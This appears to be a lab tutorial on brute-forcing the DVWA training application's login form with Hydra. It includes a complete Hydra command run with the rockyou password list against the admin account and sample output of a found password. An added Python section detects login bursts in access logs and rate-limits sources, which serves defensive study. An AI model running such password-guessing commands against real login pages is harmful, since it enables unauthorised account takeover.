TL;DR
This guide shows you how to crack the brute force login page on DVWA v1.0.7 using the Hydra tool. We’ll use a common password list and demonstrate a basic attack command.
Prerequisites
- A running instance of DVWA (v1.0.7).
- Hydra installed on your Kali Linux machine or similar. You can install it with:
sudo apt update && sudo apt install hydra
- Basic understanding of the command line.
Steps
- Find the Login Form URL
- In DVWA, navigate to the ‘Brute Force’ module.
- Note the URL of the login form. It will likely be something like
http://localhost/dvwa/brute_force.php. Replace this with your actual DVWA URL in the following steps.
- Download a Password List
- You’ll need a password list to try different combinations. A common one is RockYou.txt. You can download it from various sources online (be careful about where you download files from!). For example:
wget https://crackstation.net/files/rockyou.txt.gz
- Unzip the file:
gunzip rockyou.txt.gz
- Run Hydra
- Open a terminal and use the following command to start the attack. Important: Adjust the username, password list path, and DVWA URL as needed! Hydra takes the host and the form path as separate arguments and uses ^USER^ and ^PASS^ as its substitution markers, so the command is:
hydra -l admin -P /path/to/rockyou.txt localhost http-post-form "/dvwa/brute_force.php:username=^USER^&password=^PASS^:F=<text shown on a failed login>"
- -l admin: Specifies the username to use (in this case, ‘admin’).
- -P /path/to/rockyou.txt: Specifies the path to your password list file. Replace `/path/to/rockyou.txt` with the actual location of the rockyou.txt file on your system.
- localhost: The host running DVWA. Replace with your DVWA host.
- http-post-form: Tells Hydra to use an HTTP POST form attack.
- "/dvwa/brute_force.php:...": The path of the login form, followed by the POST parameters. `^USER^` and `^PASS^` are replaced by the username and by each password in the list.
- F=<text shown on a failed login>: The string Hydra looks for in the response to recognise a failed attempt; replace the placeholder with the exact error message your DVWA page returns on a wrong password, otherwise every attempt is reported as valid.
- Monitor the Output
- Hydra will start trying different passwords from your list. Watch the terminal output for successful login attempts. If a password is found, it will be displayed in the output, for example:
[STATUS] 192 targets scanned in 0.00 seconds (178 req/sec)
[LOGIN] admin:password123@localhost/dvwa/brute_force.php - VALID
- Log in to DVWA
- Once you have a valid username and password, log in to the DVWA application using those credentials.
Important Considerations
- Rate Limiting: DVWA may implement rate limiting which will slow down or block your attack if you send too many requests too quickly. The same mechanism is what defenders rely on: an attack like the one above produces hundreds of requests per second to a single login URL from one source, which stands out clearly in web server logs.
- Password List Quality: The success of this attack depends heavily on the quality and size of your password list.
- Ethical Hacking: Only perform these attacks on systems you have explicit permission to test. Unauthorized access is illegal and unethical.
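The rate-limiting consideration above is the defender's side of this exercise. The following added example (it is not part of the original guide and not DVWA or Hydra code) shows what the attack looks like to the target: it parses access-log lines in the common Apache/nginx combined format, flags any source IP that hits the login path more than a threshold number of times inside a sliding window, and includes a small per-source rate limiter of the kind DVWA's higher security levels approximate. The log lines, IP addresses and timestamps are constructed sample data; the login path is the one used in this guide.

```python
"""Spot password-guessing bursts against a login form in web server logs,
and enforce a per-source attempt limit. Added example; sample data is constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access-log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Login path from the guide; a real deployment would use DVWA's actual form URL.
LOGIN_PATH = "/dvwa/brute_force.php"


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # ignore query string when matching the path
        "status": int(m["status"]),
    }


def detect_bursts(lines, login_path=LOGIN_PATH, window_seconds=60, threshold=20):
    """Return {ip: peak_count} for every source that requested login_path more than
    `threshold` times within any `window_seconds` sliding window. Lines are assumed
    to be in chronological order, as they are in a live access log."""
    recent = defaultdict(deque)  # ip -> timestamps of its recent login requests
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] != login_path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()  # drop requests that fell out of the window
        if len(q) > threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


class LoginRateLimiter:
    """Allow at most `max_attempts` login attempts per source within `window_seconds`.
    Hydra's 178 req/sec would exhaust a 5-per-5-minutes budget on the first second."""

    def __init__(self, max_attempts=5, window_seconds=300):
        self.max_attempts = max_attempts
        self.window = timedelta(seconds=window_seconds)
        self.attempts = defaultdict(deque)

    def allow(self, ip, now):
        """Record an attempt from `ip` at time `now`; return False once the budget is spent."""
        q = self.attempts[ip]
        q.append(now)
        while now - q[0] > self.window:
            q.popleft()
        return len(q) <= self.max_attempts


def _log_line(ip, ts, path, status):
    # Constructed sample line in combined format (user-agent value is arbitrary).
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "POST {path} HTTP/1.1" {status} 1534 "-" "Mozilla/5.0"'


def build_sample_log():
    """Constructed log: one ordinary user with three attempts spread over 80 seconds,
    and one client firing 60 attempts at the login form within three seconds."""
    base = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc)
    lines = [_log_line("192.168.1.20", base + timedelta(seconds=40 * i), LOGIN_PATH, 200) for i in range(3)]
    lines += [_log_line("10.0.0.5", base + timedelta(seconds=i // 20), LOGIN_PATH, 200) for i in range(60)]
    # Chronological order, as a real log would be.
    lines.sort(key=lambda ln: parse_line(ln)["ts"])
    return lines


if __name__ == "__main__":
    for ip, peak in detect_bursts(build_sample_log()).items():
        print(f"{ip}: {peak} login requests inside one 60s window")
```

Feed the function real log lines (e.g. `detect_bursts(open("access.log"))`) and tune `threshold` and `window_seconds` to the site's normal traffic; the limiter is the shape of the control you would put in front of the login handler, keyed by source address and, ideally, by account as well.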

